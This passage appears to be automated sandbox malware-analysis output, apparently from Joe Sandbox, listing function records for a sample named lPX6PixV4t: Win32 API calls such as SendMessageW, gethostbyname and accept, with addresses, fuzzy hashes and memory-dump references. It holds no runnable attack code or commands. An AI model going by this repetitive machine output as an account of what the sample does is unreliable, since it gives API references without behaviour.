                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                          • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                          • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                          • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                          APIs
                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                          • _wcslen.LIBCMT ref: 00449519
                          • _wcslen.LIBCMT ref: 00449526
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend_wcslen$_wcspbrk
                          • String ID:
                          • API String ID: 2886238975-0
                          • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                          • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                          • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                          • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __setmode$DebugOutputString_fprintf
                          • String ID:
                          • API String ID: 1792727568-0
                          • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                          • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                          • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                          • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                          APIs
                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                          • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                          • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                          • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                          • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                          APIs
                            • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                            • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                            • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                          • lstrlenW.KERNEL32(?), ref: 00434CF6
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                          • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen$_malloc
                          • String ID: cdecl
                          • API String ID: 3850814276-3896280584
                          • Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                          • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                          • Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                          • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                          APIs
                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                          • gethostbyname.WSOCK32(?), ref: 0046D42D
                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                          • _memmove.LIBCMT ref: 0046D475
                          • inet_ntoa.WSOCK32(?), ref: 0046D481
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                          • String ID:
                          • API String ID: 2502553879-0
                          • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                          • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                          • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                          • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                          APIs
                          • SendMessageW.USER32 ref: 00448C69
                          • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                          • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow
                          • String ID:
                          • API String ID: 312131281-0
                          • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                          • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                          • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                          • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                          APIs
                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                          • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorLastacceptselect
                          • String ID:
                          • API String ID: 385091864-0
                          • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                          • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                          • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                          • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                          • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                          • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                          • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                          • GetStockObject.GDI32(00000011), ref: 00430258
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                          • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$CreateMessageObjectSendShowStock
                          • String ID:
                          • API String ID: 1358664141-0
                          • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                          • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                          • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                          • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                          • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                          • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                          • String ID:
                          • API String ID: 2880819207-0
                          • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                          • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                          • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                          • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00430BA2
                          • ScreenToClient.USER32(?,?), ref: 00430BC1
                          • ScreenToClient.USER32(?,?), ref: 00430BE2
                          • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ClientRectScreen$InvalidateWindow
                          • String ID:
                          • API String ID: 357397906-0
                          • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                          • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                          • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                          • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                          APIs
                          • __wsplitpath.LIBCMT ref: 0043392E
                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                          • __wsplitpath.LIBCMT ref: 00433950
                          • __wcsicoll.LIBCMT ref: 00433974
                          • __wcsicoll.LIBCMT ref: 0043398A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                          • String ID:
                          • API String ID: 1187119602-0
                          • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                          • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                          • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                          • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                          • String ID:
                          • API String ID: 1597257046-0
                          • Opcode ID: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                          • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                          • Opcode Fuzzy Hash: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                          • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                          APIs
                          • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                          • __malloc_crt.LIBCMT ref: 0041F5B6
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: EnvironmentStrings$Free__malloc_crt
                          • String ID:
                          • API String ID: 237123855-0
                          • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                          • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                          • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                          • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: DeleteDestroyObject$IconWindow
                          • String ID:
                          • API String ID: 3349847261-0
                          • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                          • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                          • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                          • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                          APIs
                          • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
